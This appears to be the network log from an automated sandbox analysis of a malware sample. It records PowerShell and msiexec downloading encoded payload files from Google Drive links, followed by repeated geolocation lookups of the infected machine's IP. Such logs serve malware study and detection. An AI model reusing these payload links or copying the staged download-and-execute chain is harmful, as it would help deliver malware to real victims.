                                                                            Oct 23, 2024 17:24:03.615462065 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:03 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 35c78d1648f72dc37e039daf51e75071
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            0 | 192.168.2.10 | 49740 | 142.250.185.206 | 443 | 7924 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:00 UTC | 215 | OUT | GET /uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: drive.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:00 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Wed, 23 Oct 2024 15:23:00 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy: script-src 'nonce-pFNHcyv2fGDS1iv0lviUSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            1 | 192.168.2.10 | 49746 | 142.250.185.65 | 443 | 7924 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:01 UTC | 233 | OUT | GET /download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:03 UTC | 4897 | IN | HTTP/1.1 200 OK
                                                                            Content-Type: application/octet-stream
                                                                            Content-Security-Policy: sandbox
                                                                            Content-Security-Policy: default-src 'none'
                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                            X-Content-Security-Policy: sandbox
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Resource-Policy: same-site
                                                                            X-Content-Type-Options: nosniff
                                                                            Content-Disposition: attachment; filename="Blomsterkosts.psm"
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 475152
                                                                            Last-Modified: Wed, 23 Oct 2024 10:02:46 GMT
                                                                            X-GUploader-UploadID: AHmUCY2NdhKBmanWFfKSqJwgNVKL2BSxpBX5rIbKALF3L4pjjnZ__AJBvY3RflFQaHV_8NXMR4kuHZPHKA
                                                                            Date: Wed, 23 Oct 2024 15:23:03 GMT
                                                                            Expires: Wed, 23 Oct 2024 15:23:03 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=+3BAgw==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close
                                                                            Data Ascii: YZQU4qQIZ49XpO7VgUqiNb5WYEm+VmBJvlZgSb5WYEm+VmBJvlZiTP0mhVz4YIV/w8oSvib3hFlIfBh1vhcUSb5WYEm+VmBJvlZgSb5WYEm+VmBJvlRAgf1IqW8wcma+zFGkH9+CzHW6BvBJvlZgSb5WYEm+VmBJvlZgSb5WYEm+VHJPq37fjVrOrr8plAhAjFGl8cQY6+0+UmBIAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAAC


                                                                            Session ID: 2 | Source IP: 192.168.2.10 | Source Port: 49970 | Destination IP: 142.250.185.206 | Destination Port: 443 | PID: 4104 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:44 UTC | 216 | OUT | GET /uc?export=download&id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            2024-10-23 15:23:44 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Wed, 23 Oct 2024 15:23:44 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-1atmTp39x0i0PTMcCAxV8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session ID: 3 | Source IP: 192.168.2.10 | Source Port: 49977 | Destination IP: 142.250.185.65 | Destination Port: 443 | PID: 4104 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:45 UTC | 258 | OUT | GET /download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:47 UTC | 4893 | IN | HTTP/1.1 200 OK
                                                                            Content-Type: application/octet-stream
                                                                            Content-Security-Policy: sandbox
                                                                            Content-Security-Policy: default-src 'none'
                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                            X-Content-Security-Policy: sandbox
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Resource-Policy: same-site
                                                                            X-Content-Type-Options: nosniff
                                                                            Content-Disposition: attachment; filename="VWPqBY161.bin"
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 275008
                                                                            Last-Modified: Wed, 23 Oct 2024 10:00:29 GMT
                                                                            X-GUploader-UploadID: AHmUCY1VLAeRiRWkC4XoAJCpr3d2mbbvdyuaKmlmJ-CHKGwf0-TRMtms0-k8V7qaG7GTKdnXO1sr0ZyyMg
                                                                            Date: Wed, 23 Oct 2024 15:23:47 GMT
                                                                            Expires: Wed, 23 Oct 2024 15:23:47 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=CVDB1A==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session ID: 4 | Source IP: 192.168.2.10 | Source Port: 49980 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 4104 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:51 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:51 UTC | 906 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:51 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32967
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIsicn%2BAgACqDVAdqCek1KFq%2Fxiq2lleP8PnT2%2FkapcfHftUHQ%2B%2By9Ws4%2BLXHprT9%2B1Y4UDfraVW0N52djxstkZ4285unHZlcRdxdxKRj7rPxGuOJXtl7DycFEYGPNl0P%2BR%2B4mcL"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb0fba48e7eb-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2122&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1313378&cwnd=251&unsent_bytes=0&cid=a0448c1a7b9a4f03&ts=179&x=0"
                                                                            2024-10-23 15:23:51 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:51 UTC | 5 | IN | Data Ascii: 0


                                                                            Session ID: 5 | Source IP: 192.168.2.10 | Source Port: 49981 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 4104 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:52 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-23 15:23:52 UTC | 896 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:52 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32968
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2X8yRVTRBw7ZMFLUIsA2wzE7VuIRGl7w5aVBl631%2FPvsWZUb0QErxzhmV0r5S10ZYw5N1EDPlHkBhRHf%2BbODZUOQwr6hB9XuThuT8eBqEMxCHBCZ%2Bl6Vd56I8ltXQZP22p0nM%2B3b"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb160db14635-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2276729&cwnd=248&unsent_bytes=0&cid=615a18fb047271cd&ts=187&x=0"
                                                                            2024-10-23 15:23:52 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:52 UTC | 5 | IN | Data Ascii: 0


                                                                            Session ID: 6 | Source IP: 192.168.2.10 | Source Port: 49983 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 4104 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:54 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-23 15:23:54 UTC | 900 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:54 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32970
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2fG9G04zLJVxD4vbPsM3QqWXMchxrAENFOnOdpzNe2lE7Ckd%2B8G%2F2dcHvgVqCqDzMjjrGkX6%2FhBPaB2btU2XP%2BxznSOQF1%2BQvsHeqWgIGoR2q%2BZMZhHYfzH6nmFwmvphezL2mKs"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb206f2a2ca9-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1785450&cwnd=251&unsent_bytes=0&cid=9df8be6d7b37c13d&ts=177&x=0"
                                                                            2024-10-23 15:23:54 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            7 | 192.168.2.10 | 49985 | 188.114.96.3 | 443 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:56 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:56 UTC | 896 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:56 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32972
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RdVV5x2NDBwIMPIckqzHEB5SVl6n1hBe4yQBdTtAvr%2FKQIL8aQ1KhzKy0jGFeSa42ddWAwfekd61iRRZfsoVA%2FWniuSmTfx%2Bp1v5NOX3QQFDSxYGQKIPvrXt6abEY0F6k%2BGlTNMP"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb2ba9c12839-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1366&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2043754&cwnd=238&unsent_bytes=0&cid=c33d8240eceebded&ts=167&x=0"
                                                                            2024-10-23 15:23:56 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            8 | 192.168.2.10 | 49987 | 188.114.96.3 | 443 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:57 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-23 15:23:57 UTC | 896 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:57 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32973
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2Fs9VD9IFIykVjii6EazaB2Tul79bobDDtsEiSV3%2BZpTjiNhn74QBxJ31%2FpF4ldsyOME1qy0PQJdRZ6ojGkHQmOU274zqdJGvd2QqLruPo3Cv1mYn9t%2FwPghqspPqStQE6udvvrR"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb35d88946e9-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2473099&cwnd=248&unsent_bytes=0&cid=a81c7bc7b9369516&ts=158&x=0"
                                                                            2024-10-23 15:23:57 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            9 | 192.168.2.10 | 49989 | 188.114.96.3 | 443 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:23:59 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:59 UTC | 904 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:59 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32975
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iaiUBbXExcD%2FBeyB4rh%2Fq6%2BEvAtWY82z3UMraWGk%2BH2z%2FBrhx2Y68B6lLGTpkBpEQQCWKMGkebcZJ4l%2FkvGPK4425GLFsDo05jqRAKoYQRilH2QCqMFnVhAAc8bOM%2F%2FKwnqM3uT3"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb3fdfc5e997-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1305&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2116959&cwnd=250&unsent_bytes=0&cid=af0bb251473bc508&ts=205&x=0"
                                                                            2024-10-23 15:23:59 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            10 | 192.168.2.10 | 49991 | 188.114.96.3 | 443 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:24:00 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-23 15:24:01 UTC | 904 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:01 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32977
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKVAVeZzya%2FwdZLew97FfQ7EIYpCmB8%2FGEGBkjWqIRumqSjtXdoz6mR7p%2FcdYagAxA%2BXNG6YZIuW%2FbFwXn3ch%2B2eTE%2BSGkEEiTEIrGoXTTiha5AYHm2zpfr059%2BZLTfOBP7550UY"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb4a4ef86c57-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2222563&cwnd=251&unsent_bytes=0&cid=e8fa356c613eb154&ts=165&x=0"
                                                                            2024-10-23 15:24:01 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:24:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            11 | 192.168.2.10 | 49993 | 188.114.96.3 | 443 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-10-23 15:24:02 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:24:02 UTC | 902 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:02 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32978
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7mpbHW8Or4R%2FRrQquOGduBcbSWNPQ8lQRU3TCCb%2BRjKVtlD4hlKv%2B5RGWPz6UALq4Ta4KF4ChtI%2Bj1we4FT6ivMoewlTw6Aqys%2FLjrDhkGnfI%2Bd7bJWWnWtdlO%2BT5btE3MMx1fDe"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb54a9bd6b4c-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1217&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2124724&cwnd=231&unsent_bytes=0&cid=d1bfcd6f30ee58dc&ts=175&x=0"
